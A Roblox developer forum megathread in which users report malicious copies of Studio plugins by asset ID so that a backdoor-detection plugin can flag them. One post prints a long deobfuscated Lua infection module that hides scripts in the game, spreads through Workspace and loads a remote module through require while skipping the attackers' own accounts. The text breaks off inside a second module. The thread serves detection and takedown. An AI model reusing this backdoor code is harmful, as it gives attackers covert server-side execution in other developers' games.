Known Malicious Plugins for HISR detection Megathread

studio

#1

This is a megathread for posting any malicious plugins you find (ones that inject malicious code or infections into the user’s games) which I will regularly check, verify the plugin is malicious, and add to the HISR plugin’s known malicious plugin list. This will allow any user who uses HISR V2.1+ with the setting enabled to scan for know malicious plugins to be notified that they own a malicious plugin as well as list the original plugin if known so that they may remove/replace the (copied) malicious plugin.

This is the active list of known malicious plugins that the HISR plugin uses for detection: https://www.roblox.com/library/2732065843/Known-Malicious-Plugins-Table-Hidden-Infection-S
If the plugin ID that you found as being malicious isn’t there then please make a post in the following template so that I may review and add it to the list for the HISR plugin.

Template for listing malicious plugins:

Malicious plugin: 2631801555
Original plugin: 338813970

P.S. As always it’s a good idea to “Report Abuse” on copied and/or malicious plugins so that ROBLOX may CD them. This is just to notify users about the malicious plugin in the mean time.


V2.1 - Plugin: Hidden Backdoor/Infection Script Detector (Detects/Removes infections from malicious plugins)
V2.1 - Plugin: Hidden Backdoor/Infection Script Detector (Detects/Removes infections from malicious plugins)
Malicious plugin spotted?
#2

Hope this contribution helps!

Camera Light

Malicious: 2715008764
Original: 163874890

Brick Draw

Malicious: 2661950443
Original: 802969927

Model Mirror

Malicious: 2644964458
Original: 1162948697

Sprint

Malicious: 2644964457
Original: 852963967

Tree Generator

Malicious: 2644964454
Original: 1256428022

Class Converter

Malicious: 2644964449
Original: 833851216

Landscape Plugin

Malicious: 2672245855
Original: 242938331

Global Replace Utility

Malicious: 2672245883
Original: 1053075232

Player / Group Tags

Malicious: 2672245890
Original: CAN’T FIND ORIGINAL

Block To Room

Malicious: 2661950467
Original: 875926724

Catalog Import Tool

Malicious: 2661950445
Original: 965352286

Minimap Generation Plugin

Malicious: 2661950461
Original: 1873722908

Quick Paint Tool (For Single/Multi Bricks)

Malicious: 2623611354
Original: 160236414

Catalog Loader

Malicious: 2623611352
Original: 997404854

3D Text

Malicious: 2623611348
Original: 2273628561


#3

The fact that the malicious version of my plugin has 11k installs just baffles me.


#4

They bot the sales a lot so people see them.


#5

Gapfill (The malicious one was made January 3rd of 2019, soo…

Malicious: 2613864560
Original:165687726

I also dragged the model from the installed plugins folder on my computer into the game, and they made a server script in there.


#6

All reported plugins so far have been reviewed and added. Thank you @duke_tylerjone and @MrLonely1221!


#7

Couldn’t Roblox implement algorithms to detect plugins or models that had rapid and unexpected plugin growth? Because all of these are seen due to bots boosting the sales. Additionally, put a 2 or so month long minimium on uploading public plugins. That can atleast rat out the bots that make accounts and immediatly upload stuff. Maybe even flag plugins with the same thumbnail and name or things like that?


#8

Ultimate Model Stretch / Extend (1 dimensional)

Malicious: 2634252959
Original: 1032987767


#9

This is marking my custom made scripts viruses. I used the “Store” feature and I deleted the “Infections” folder not knowing what I was doing. Is there a way to reverse this?


#10

This should be on the topic for the plugin but you can either try undo (ctrl+z) or go to your place page on the roblox website, click the … at the top right, then configure place, then locate the versions and click the link to the version before the top-most one. This will revert your game to right before the last publish. (Assuming that you published the changes already by accident. Otherwise just close studio without saving or publishing and reopen it.) After that just click “Whitelist” if you want to select some scripts to not be marked as viruses. (Also if you want to use the script whitelist then make sure to turn it on in the settings.)


#11

Even though Roblox probably should implement some detection system, it must be also considered the higher end and more noticed developers who release a new plugin will also get a massive amount of sales. For example, if a YouTuber with 1 million subs releases a completely safe plugin and their community is absolutely hyped for its release, you can probably expect a solid 10k-50k (random guesstimates) sales just on the first day of its release.

p.s. this is probably more off topic than should be :sweat_smile:


#12

Block Terrain Plugin

Malicious: 2760053105
Original: 250511443


#13

Just as an FYI, these have all been sent to moderation to be deleted.


#14

Malicious plugin: 2760053108
Original plugin: 637905041


#15

I am still confused as to why the users creating these backdoors get their accounts deleted, but the actual malicious assets remain. Everything should be gone. Additionally, I feel like IP bans and machine bans would be a more viable solution then just deleting the account because spoofing the machine hardware ID is much more time consuming and we all know these backdoors are coming from a select few exploit developers that are trying to sell products with “server sided script execution”, after FE was mandated.


#16

Malicious plugin: 2787024683
Original: 171505690

Module being required: 2674688515

Who needs to deobsfucate when you can just change the environment
getfenv()["require"] = function(...) warn(...) end


#17

Malicious plugin: 2787024663
Original: 519874479

Requires same module: 2674688515


#18

Plugin requires 2674688515, deobfuscated version below:

Deobfuscated: (Module: MainModule)

--Deobfuscated by MSandbox v1.0.0 by 3dsboy08 (static-obfax)

local L_1_, L_2_, L_3_, L_4_, L_5_, L_6_, L_7_, L_8_, L_9_, L_10_, L_11_, L_12_, L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_
L_1_ = newproxy
L_2_ = true
L_1_ = L_1_(L_2_)
L_2_ = getmetatable
L_3_ = L_1_
L_2_ = L_2_(L_3_)
function L_3_(L_49_arg1, L_50_arg2)
	local L_51_
	if L_50_arg2 == "lshift" then
		function L_51_(L_52_arg1, L_53_arg2)
			local L_54_
			L_54_ = 2 ^ L_53_arg2
			L_54_ = L_52_arg1 * L_54_
			return L_54_
		end
		return L_51_
	elseif L_50_arg2 == "rshift" then
		function L_51_(L_55_arg1, L_56_arg2)
			return math.floor(L_55_arg1 / 2 ^ L_56_arg2)
		end
		return L_51_
	elseif L_50_arg2 == "_gbc" then
		function L_51_(L_57_arg1)
			while L_57_arg1 > 1 do
				L_57_arg1 = _UPVALUE0_.rshift(L_57_arg1, 1)
			end
			return 2
		end
		return L_51_
	elseif L_50_arg2 == "xor" then
		function L_51_(L_58_arg1, L_59_arg2)
			local L_60_, L_61_, L_62_, L_63_, L_64_, L_65_
			L_60_ = math
			L_60_ = L_60_.max
			L_61_ = _UPVALUE0_
			L_61_ = L_61_._gbc
			L_61_ = L_61_(L_62_)
			L_65_ = L_62_(L_63_)
			L_60_ = L_60_(L_61_, L_62_, L_63_, L_64_, L_65_, L_62_(L_63_))
			L_61_ = {}
			for L_66_forvar1 = 0, L_60_ - 1 do
				L_61_[L_60_ - L_66_forvar1] = _UPVALUE0_._gbc(L_58_arg1, L_66_forvar1, 1) ~= _UPVALUE0_._gbc(L_59_arg2, L_66_forvar1, 1) and 1 or 0
			end
			L_65_ = ""
			return L_62_(L_63_, L_64_)
		end
		return L_51_
	end
end
L_2_.__index = L_3_
L_2_ = newproxy
L_3_ = true
L_2_ = L_2_(L_3_)
L_3_ = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
L_4_ = {
	L_5_,
	L_6_,
	L_7_,
	L_8_,
	L_9_,
	L_10_,
	L_11_,
	L_12_,
	L_13_,
	L_14_,
	L_15_,
	L_16_,
	L_17_,
	L_18_,
	L_19_,
	L_20_
}
L_5_ = "\197\147"
L_6_ = "\226\136\145"
L_7_ = "\194\174"
L_11_ = "\226\136\154"
L_12_ = "\226\136\171"
L_13_ = "\203\154"
L_17_ = "\194\170"
L_18_ = "\194\186"
L_19_ = "\226\128\147"
L_20_ = "\226\137\160"
L_5_ = getmetatable
L_6_ = L_2_
L_5_ = L_5_(L_6_)
function L_6_(L_67_arg1, L_68_arg2)
	local L_69_
	if L_68_arg2 == "encode" then
		function L_69_(L_70_arg1)
			return (L_70_arg1:gsub(".", function(L_71_arg1)
				local L_72_
				L_72_ = ""
				for L_73_forvar1 = 8, 1, -1 do
					L_72_ = L_72_ .. (L_71_arg1:byte() % 2 ^ L_73_forvar1 - L_71_arg1:byte() % 2 ^ (L_73_forvar1 - 1) > 0 and "1" or "0")
				end
				return L_72_
			end) .. "0000"):gsub("%d%d%d?%d?%d?%d?", function(L_74_arg1)
				local L_75_, L_76_, L_77_, L_78_, L_79_
				L_75_ = #L_74_arg1
				if L_75_ < 6 then
					L_75_ = ""
					return L_75_
				end
				L_75_ = 0
				for L_80_forvar1 = 1, 6 do
					L_75_ = L_75_ + (L_74_arg1:sub(L_80_forvar1, L_80_forvar1) == "1" and 2 ^ (6 - L_80_forvar1) or 0)
				end
				L_79_ = L_75_ + 1
				return L_76_(L_77_, L_78_, L_79_)
			end) .. ({
				"",
				"",
				""
			})[#L_70_arg1 % 3 + 1]
		end
		return L_69_
	elseif L_68_arg2 == "decode" then
		function L_69_(L_81_arg1)
			L_81_arg1 = string.gsub(L_81_arg1, "[^" .. _UPVALUE0_ .. "=]", "")
			return (L_81_arg1:gsub(".", function(L_82_arg1)
				local L_83_
				if L_82_arg1 == "=" then
					L_83_ = ""
					return L_83_
				end
				L_83_ = ""
				for L_84_forvar1 = 6, 1, -1 do
					L_83_ = L_83_ .. ((_UPVALUE0_:find(L_82_arg1) - 1) % 2 ^ L_84_forvar1 - (_UPVALUE0_:find(L_82_arg1) - 1) % 2 ^ (L_84_forvar1 - 1) > 0 and "1" or "0")
				end
				return L_83_
			end):gsub("%d%d%d?%d?%d?%d?%d?%d?", function(L_85_arg1)
				local L_86_, L_87_, L_88_, L_89_, L_90_
				L_86_ = #L_85_arg1
				if L_86_ ~= 8 then
					L_86_ = ""
					return L_86_
				end
				L_86_ = 0
				for L_91_forvar1 = 1, 8 do
					L_86_ = L_86_ + (L_85_arg1:sub(L_91_forvar1, L_91_forvar1) == "1" and 2 ^ (8 - L_91_forvar1) or 0)
				end
				return L_87_(L_88_)
			end))
		end
		return L_69_
	end
end
L_5_.__index = L_6_
L_5_ = newproxy
L_6_ = true
L_5_ = L_5_(L_6_)
L_6_ = getmetatable
L_7_ = L_5_
L_6_ = L_6_(L_7_)
function L_7_(L_92_arg1, L_93_arg2)
	local L_94_
	if L_93_arg2 == "split" then
		function L_94_(L_95_arg1, L_96_arg2)
			local L_97_, L_98_, L_99_, L_100_, L_101_
			L_97_ = {}
			L_101_ = L_96_arg2
			for L_102_forvar1 in L_98_(L_99_, L_100_) do
				table.insert(L_97_, L_102_forvar1)
			end
			return L_97_
		end
		return L_94_
	elseif L_93_arg2 == "die" then
		function L_94_()
			local L_103_, L_104_
			while true do
			end
		end
		return L_94_
	end
end
L_6_.__index = L_7_
L_6_ = game
L_7_ = L_6_
L_6_ = L_6_.WaitForChild
L_6_(L_7_, L_8_)
L_6_ = game
L_6_ = L_6_.ChildAdded
L_7_ = L_6_
L_6_ = L_6_.connect
L_6_(L_7_, L_8_)
L_6_ = game
L_6_ = L_6_.Workspace
L_6_ = L_6_.ChildAdded
L_7_ = L_6_
L_6_ = L_6_.connect
L_6_(L_7_, L_8_)
L_6_ = {
	L_7_,
	L_8_,
	L_9_,
	L_10_,
	L_11_,
	L_12_,
	L_13_
}
L_7_ = "\229\135\137"
L_11_ = "\195\140\194\191\226\128\162"
L_12_ = "\231\148\159"
L_13_ = "\194\191"
L_7_ = {}
for L_105_forvar1 = 48, 57 do
	L_12_ = table
	L_12_ = L_12_.insert
	L_13_ = L_7_
	L_48_ = L_14_(L_15_)
	L_12_(L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_, L_14_(L_15_))
end
for L_106_forvar1 = 65, 90 do
	L_12_ = table
	L_12_ = L_12_.insert
	L_13_ = L_7_
	L_48_ = L_14_(L_15_)
	L_12_(L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_, L_14_(L_15_))
end
for L_107_forvar1 = 97, 122 do
	L_12_ = table
	L_12_ = L_12_.insert
	L_13_ = L_7_
	L_48_ = L_14_(L_15_)
	L_12_(L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_, L_14_(L_15_))
end
L_11_ = 900000
L_11_ = L_10_
L_12_ = "HttpService"
L_11_ = L_10_
L_12_ = true
L_11_ = game
L_12_ = L_11_
L_11_ = L_11_.GetService
L_13_ = "HttpService"
L_11_ = L_11_(L_12_, L_13_)
L_12_ = L_11_
L_11_ = L_11_.GenerateGUID
L_13_ = false
L_11_ = L_11_(L_12_, L_13_)
function L_12_(L_108_arg1)
	local L_109_, L_110_
	L_109_ = math
	L_109_ = L_109_.randomseed
	L_110_ = tick
	L_110_ = L_110_()
	L_109_(L_110_, L_110_())
	L_109_ = {}
	L_110_ = math
	L_110_ = L_110_.random
	for L_111_forvar1 = 1, #L_108_arg1 do
		if (L_111_forvar1 - 1) * L_110_() - (L_111_forvar1 - 1) * L_110_() % 1 == L_111_forvar1 - 1 then
			L_109_[#L_109_ + 1] = L_108_arg1[L_111_forvar1]
		else
			L_109_[#L_109_ + 1] = L_109_[(L_111_forvar1 - 1) * L_110_() - (L_111_forvar1 - 1) * L_110_() % 1 + 1]
			L_109_[(L_111_forvar1 - 1) * L_110_() - (L_111_forvar1 - 1) * L_110_() % 1 + 1] = L_108_arg1[L_111_forvar1]
		end
	end
	return L_109_
end
G_1_ = L_12_
function L_12_(L_112_arg1, L_113_arg2, L_114_arg3)
	local L_115_, L_116_, L_117_, L_118_
	L_115_ = string
	L_115_ = L_115_.find
	L_116_ = L_112_arg1
	L_117_ = L_113_arg2
	L_116_ = L_115_(L_116_, L_117_)
	L_117_ = string
	L_117_ = L_117_.sub
	L_118_ = L_112_arg1
	L_117_ = L_117_(L_118_, 1, L_115_ - 1)
	L_118_ = string
	L_118_ = L_118_.sub
	L_118_ = L_118_(L_112_arg1, L_116_ + 1, string.len(L_112_arg1))
	return L_117_ .. L_114_arg3 .. L_118_
end
G_2_ = L_12_
function L_12_(L_119_arg1)
end
G_3_ = L_12_
L_12_ = {}
G_4_ = L_12_
L_12_ = Instance
L_12_ = L_12_.new
L_13_ = "Backpack"
L_12_ = L_12_(L_13_)
L_13_ = Instance
L_13_ = L_13_.new
L_13_ = L_13_(L_14_, L_15_)
if L_14_ ~= 7368818 then
	if L_14_ ~= 998796 then
		for L_120_forvar1 = 1, 20 do
			L_18_ = Instance
			L_18_ = L_18_.new
			L_19_ = "StringValue"
			L_20_ = L_13_
			L_18_ = L_18_(L_19_, L_20_)
			L_3_ = L_18_
			L_13_ = L_3_
		end
	end
end
G_5_ = L_14_
G_6_ = L_14_
G_7_ = L_14_
L_12_.Parent = L_14_
L_17_ = 5
L_17_ = #L_6_
L_17_ = math
L_17_ = L_17_.random
L_18_ = 1
L_19_ = 30000
L_17_ = L_17_(L_18_, L_19_)
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_20_ = math
L_20_ = L_20_.random
L_21_ = #L_6_
L_20_ = L_20_(L_21_)
L_20_ = L_6_[L_20_]
L_14_.Name = L_15_
L_17_ = 5
L_17_ = #L_6_
L_17_ = math
L_17_ = L_17_.random
L_18_ = 1
L_19_ = 30000
L_17_ = L_17_(L_18_, L_19_)
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_20_ = math
L_20_ = L_20_.random
L_21_ = #L_6_
L_20_ = L_20_(L_21_)
L_20_ = L_6_[L_20_]
L_14_.Name = L_15_
L_17_ = 5
L_17_ = #L_6_
L_17_ = math
L_17_ = L_17_.random
L_18_ = 1
L_19_ = 30000
L_17_ = L_17_(L_18_, L_19_)
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_20_ = math
L_20_ = L_20_.random
L_21_ = #L_6_
L_20_ = L_20_(L_21_)
L_20_ = L_6_[L_20_]
L_14_.Name = L_15_
L_17_ = 1
L_18_ = 30000
L_17_ = math
L_17_ = L_17_.random
L_18_ = #L_6_
L_17_ = L_17_(L_18_)
L_17_ = L_6_[L_17_]
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_12_.Name = L_14_
L_17_ = 4
L_17_ = L_8_
L_18_ = 5
L_17_ = L_17_(L_18_)
L_17_ = "i"
L_18_ = L_8_
L_19_ = 6
L_18_ = L_18_(L_19_)
L_17_ = L_17_ .. L_18_
L_18_ = "i"
L_19_ = L_8_
L_20_ = 7
L_19_ = L_19_(L_20_)
L_18_ = L_18_ .. L_19_
L_19_ = "i"
L_20_ = L_8_
L_21_ = 8
L_20_ = L_20_(L_21_)
L_19_ = L_19_ .. L_20_
L_20_ = "i"
L_21_ = L_8_
L_22_ = 9
L_21_ = L_21_(L_22_)
L_20_ = L_20_ .. L_21_
L_21_ = "i"
L_22_ = L_8_
L_23_ = 10
L_22_ = L_22_(L_23_)
L_21_ = L_21_ .. L_22_
L_22_ = "i"
L_23_ = L_8_
L_24_ = 11
L_23_ = L_23_(L_24_)
L_22_ = L_22_ .. L_23_
L_23_ = "i"
L_24_ = L_8_
L_25_ = 12
L_24_ = L_24_(L_25_)
L_23_ = L_23_ .. L_24_
L_24_ = "i"
L_25_ = L_8_
L_26_ = 13
L_25_ = L_25_(L_26_)
L_24_ = L_24_ .. L_25_
L_25_ = "i"
L_26_ = L_8_
L_27_ = 14
L_26_ = L_26_(L_27_)
L_25_ = L_25_ .. L_26_
L_26_ = "i"
L_27_ = L_8_
L_28_ = 15
L_27_ = L_27_(L_28_)
L_26_ = L_26_ .. L_27_
L_27_ = "i"
L_28_ = L_8_
L_29_ = 16
L_28_ = L_28_(L_29_)
L_27_ = L_27_ .. L_28_
L_28_ = "i"
L_29_ = L_8_
L_30_ = 18
L_29_ = L_29_(L_30_)
L_28_ = L_28_ .. L_29_
L_29_ = "i"
L_30_ = L_8_
L_31_ = 3
L_30_ = L_30_(L_31_)
L_29_ = L_29_ .. L_30_
L_30_ = "i"
L_31_ = L_8_
L_32_ = 4
L_31_ = L_31_(L_32_)
L_30_ = L_30_ .. L_31_
L_31_ = "i"
L_32_ = L_8_
L_33_ = 5
L_32_ = L_32_(L_33_)
L_31_ = L_31_ .. L_32_
L_32_ = "i"
L_33_ = L_8_
L_34_ = 6
L_33_ = L_33_(L_34_)
L_32_ = L_32_ .. L_33_
L_33_ = "i"
L_34_ = L_8_
L_35_ = 7
L_34_ = L_34_(L_35_)
L_33_ = L_33_ .. L_34_
L_34_ = "i"
L_35_ = L_8_
L_36_ = 8
L_35_ = L_35_(L_36_)
L_34_ = L_34_ .. L_35_
L_35_ = "i"
L_36_ = L_8_
L_37_ = 5
L_36_ = L_36_(L_37_)
L_35_ = L_35_ .. L_36_
L_36_ = "i"
L_37_ = L_8_
L_38_ = 9
L_37_ = L_37_(L_38_)
L_36_ = L_36_ .. L_37_
L_37_ = "i"
L_38_ = L_8_
L_39_ = 5
L_38_ = L_38_(L_39_)
L_37_ = L_37_ .. L_38_
L_38_ = "i"
L_39_ = L_8_
L_40_ = 4
L_39_ = L_39_(L_40_)
L_38_ = L_38_ .. L_39_
L_39_ = "i"
L_40_ = L_8_
L_41_ = 3
L_40_ = L_40_(L_41_)
L_39_ = L_39_ .. L_40_
L_40_ = "i"
L_41_ = L_8_
L_42_ = 4
L_41_ = L_41_(L_42_)
L_40_ = L_40_ .. L_41_
L_41_ = "i"
L_42_ = L_8_
L_43_ = 6
L_42_ = L_42_(L_43_)
L_41_ = L_41_ .. L_42_
L_42_ = "i"
L_43_ = L_8_
L_44_ = 7
L_43_ = L_43_(L_44_)
L_42_ = L_42_ .. L_43_
L_43_ = {
	L_44_,
	L_45_,
	L_46_,
	L_47_,
	L_48_,
	"i" .. L_8_(5) .. " = require ",
	"i" .. L_8_(7) .. " = 'GetService' ",
	"i" .. L_8_(4) .. " = 'FindFirstChild' ",
	"i" .. L_8_(14) .. " = 'Description' ",
	"i" .. L_8_(16) .. " = 'GetProductInfo' ",
	"i" .. L_8_(4) .. " = 'Workspace' ",
	"i" .. L_8_(7) .. " = 'ReplicatedStorage' ",
	"i" .. L_8_(4) .. " = 'PlaceId' ",
	"i" .. L_8_(10) .. " = math.sqrt ",
	"i" .. L_8_(10) .. " = 'IsStudio' ",
	"i" .. L_8_(10) .. " = 'SSM' ",
	"i" .. L_8_(10) .. " = 'MarketplaceService' ",
	"i" .. L_8_(10) .. " = 'WaitForChild' ",
	"i" .. L_8_(10) .. " = 'RunService' ",
	"i" .. L_8_(10) .. " = pcall "
}
L_44_ = "i"
L_45_ = L_8_
L_46_ = 5
L_45_ = L_45_(L_46_)
L_46_ = " = 'Debris' "
L_44_ = L_44_ .. L_45_ .. L_46_
L_45_ = "i"
L_46_ = L_8_
L_47_ = 3
L_46_ = L_46_(L_47_)
L_47_ = " = game "
L_45_ = L_45_ .. L_46_ .. L_47_
L_46_ = "i"
L_47_ = L_8_
L_48_ = 8
L_47_ = L_47_(L_48_)
L_48_ = " = 'test' "
L_46_ = L_46_ .. L_47_ .. L_48_
L_47_ = "i"
L_48_ = L_8_
L_48_ = L_48_(5)
L_47_ = L_47_ .. L_48_ .. " = 'Name' "
L_48_ = "i"
L_48_ = L_48_ .. L_8_(10) .. " = 'ClassName' "
L_44_ = math
L_44_ = L_44_.random
L_45_ = 1
L_46_ = 200
L_44_ = L_44_(L_45_, L_46_)
L_45_ = {
	L_46_,
	L_47_,
	L_48_,
	L_14_ .. " = " .. 2655056793 / L_44_ .. " * " .. L_44_ .. " ",
	L_34_ .. " = 'load' ",
	L_35_ .. " = game ",
	L_23_ .. " = 'PlaceId' ",
	L_20_ .. " = 'RunService' ",
	L_21_ .. " = 'IsStudio' "
}
L_46_ = L_42_
L_47_ = " = spawn "
L_46_ = L_46_ .. L_47_
L_47_ = L_25_
L_48_ = " = pcall "
L_47_ = L_47_ .. L_48_
L_48_ = L_22_
L_48_ = L_48_ .. " = require "
L_46_ = {
	L_47_,
	L_48_,
	L_38_ .. " = 'FindFirstChild' ",
	L_26_ .. " = getfenv ",
	L_39_ .. " = '?' ",
	L_41_ .. " = " .. L_40_ .. ".char ",
	L_36_ .. " = 'slo' ",
	L_35_ .. " = game ",
	L_23_ .. " = 'PlaceId' ",
	L_25_ .. " = pcall ",
	L_20_ .. " = 'RunService' ",
	L_21_ .. " = 'IsStudio' "
}
L_47_ = L_17_
L_48_ = " = 'GetService' "
L_47_ = L_47_ .. L_48_
L_48_ = L_18_
L_48_ = L_48_ .. " = 'Debris' "
L_47_ = {
	L_48_,
	101,
	113,
	117,
	105,
	114,
	101
}
L_48_ = 114
L_48_ = 5
L_48_ = math.random(1, 100000000)
for L_121_forvar1 = 1, #L_47_ do
	L_47_[L_121_forvar1] = L_47_[L_121_forvar1] * L_48_
end
L_45_ = G_1_(L_45_)
L_46_ = G_1_(L_46_)
G_8_ = ""
G_9_ = ""
L_43_ = G_1_(L_43_)
for L_122_forvar1 = 1, #L_45_ do
	G_9_ = G_9_ .. L_43_[L_122_forvar1] .. L_45_[L_122_forvar1]
end
L_43_ = G_1_(L_43_)
for L_123_forvar1 = 1, #L_46_ do
	G_8_ = G_8_ .. L_43_[L_123_forvar1] .. L_46_[L_123_forvar1]
end
Instance.new("Script").Source = L_40_ .. " = string " .. G_8_ .. " if " .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_20_ .. ")[" .. L_21_ .. "](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_20_ .. "))then return end;" .. L_25_ .. "(function() " .. " if " .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. ")[" .. L_38_ .. "](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. "), " .. L_39_ .. ") then " .. L_26_ .. "()[" .. L_41_ .. "(" .. L_47_[1] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[2] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[3] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[4] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[5] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[6] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[7] .. " / " .. L_48_ .. ")](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. ")[" .. L_38_ .. "](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. "), " .. L_39_ .. "))[" .. L_36_ .. "](" .. L_35_ .. "[" .. L_23_ .. "]) end end)"
Instance.new("Script").Name = math.random(3, 5) .. L_6_[math.random(#L_6_)] .. math.random(1, 30000) .. L_6_[math.random(#L_6_)] .. L_6_[math.random(#L_6_)] .. L_6_[math.random(#L_6_)]
pcall(function()
	local L_124_
	L_124_ = _UPVALUE0_
	L_124_.Parent = game.NonReplicatedCSGDictionaryService
end)
if game.CreatorId ~= 7368818 and game.CreatorId ~= 998796 then
	pcall(function()
		spawn(function()
			game:WaitForChild("ServerScriptService")
			wait(1)
			G_10_ = game:GetService("Workspace"):GetDescendants()
			G_11_ = game:GetService("StarterGui"):GetDescendants()
			G_12_ = game:GetService("ServerScriptService"):GetDescendants()
			if #G_10_ >= 30 and #G_11_ >= 2 then
				if game:GetService("Debris"):FindFirstChild("?") then
					game:GetService("Debris"):FindFirstChild("?"):remove()
				end
				if not game:GetService("Debris"):FindFirstChild("?") then
					script:WaitForChild("?"):Clone().Parent = game:GetService("Debris")
				end
				if not G_10_[math.random(#G_10_)]:IsA("Camera") and not G_10_[math.random(#G_10_)]:IsA("Terrain") then
					_UPVALUE0_.Parent = G_10_[math.random(#G_10_)]
				end
			end
			if #G_12_ >= 2 then
				G_3_(_UPVALUE1_)
			end
		end)
	end)
end

Deobfuscated: (Module: ?)

--Deobfuscated by MSandbox v1.0.0 by 3dsboy08 (static-obfax)

local L0_0, L1_1, L2_2, L3_3, L4_4
L0_0 = newproxy
L1_1 = true
L0_0 = L0_0(L1_1)
L1_1 = getmetatable
L2_2 = L0_0
L1_1 = L1_1(L2_2)
function L2_2(A0_5, A1_6)
  local L2_7
  if A1_6 == "lshift" then
    function L2_7(A0_8, A1_9)
      local L2_10
      L2_10 = 2 ^ A1_9
      L2_10 = A0_8 * L2_10
      return L2_10
    end
    return L2_7
  elseif A1_6 == "rshift" then
    function L2_7(A0_11, A1_12)
      return math.floor(A0_11 / 2 ^ A1_12)
    end
    return L2_7
  elseif A1_6 == "_gbc" then
    function L2_7(A0_13)
      while A0_13 > 1 do
        A0_13 = _UPVALUE0_.rshift(A0_13, 1)
      end
      return 1 + 1
    end
    return L2_7
  elseif A1_6 == "xor" then
    function L2_7(A0_14, A1_15)
      local L2_16, L3_17, L4_18, L5_19, L6_20, L7_21
      L2_16 = math
      L2_16 = L2_16.max
      L3_17 = _UPVALUE0_
      L3_17 = L3_17._gbc
      L3_17 = L3_17(L4_18)
      L7_21 = L4_18(L5_19)
      L2_16 = L2_16(L3_17, L4_18, L5_19, L6_20, L7_21, L4_18(L5_19))
      L3_17 = {}
      for L7_21 = 0, L2_16 - 1 do
        L3_17[L2_16 - L7_21] = _UPVALUE0_._gbc(A0_14, L7_21, 1) ~= _UPVALUE0_._gbc(A1_15, L7_21, 1) and 1 or 0
      end
      L7_21 = ""
      return L4_18(L5_19, L6_20)
    end
    return L2_7
  end
end
L1_1.__index = L2_2
L1_1 = newproxy
L2_2 = true
L1_1 = L1_1(L2_2)
L2_2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
L3_3 = {
  L4_4,
  "\226\136\145",
  "\194\174",
  "\226\128\160",
  "\194\165",
  "\195\167",
  "\226\136\154",
  "\226\136\171",
  "\203\154",
  "\226\136\154",
  "~",
  "#",
  "\194\170",
  "\194\186",
  "\226\128\147",
  "\226\137\160"
}
L4_4 = "\197\147"
L4_4 = getmetatable
L4_4 = L4_4(L1_1)
function L4_4.__index(A0_22, A1_23)
  local L2_24
  if A1_23 == "encode" then
    function L2_24(A0_25)
      return (A0_25:gsub(".", function(A0_26)
        local L1_27
        L1_27 = ""
        for _FORV_6_ = 8, 1, -1 do
          L1_27 = L1_27 .. (A0_26:byte() % 2 ^ _FORV_6_ - A0_26:byte() % 2 ^ (_FORV_6_ - 1) > 0 and "1" or "0")
        end
        return L1_27
      end) .. "0000"):gsub("%d%d%d?%d?%d?%d?", function(A0_28)
        local L1_29, L2_30, L3_31, L4_32, L5_33
        L1_29 = #A0_28
        if L1_29 < 6 then
          L1_29 = ""
          return L1_29
        end
        L1_29 = 0
        for L5_33 = 1, 6 do
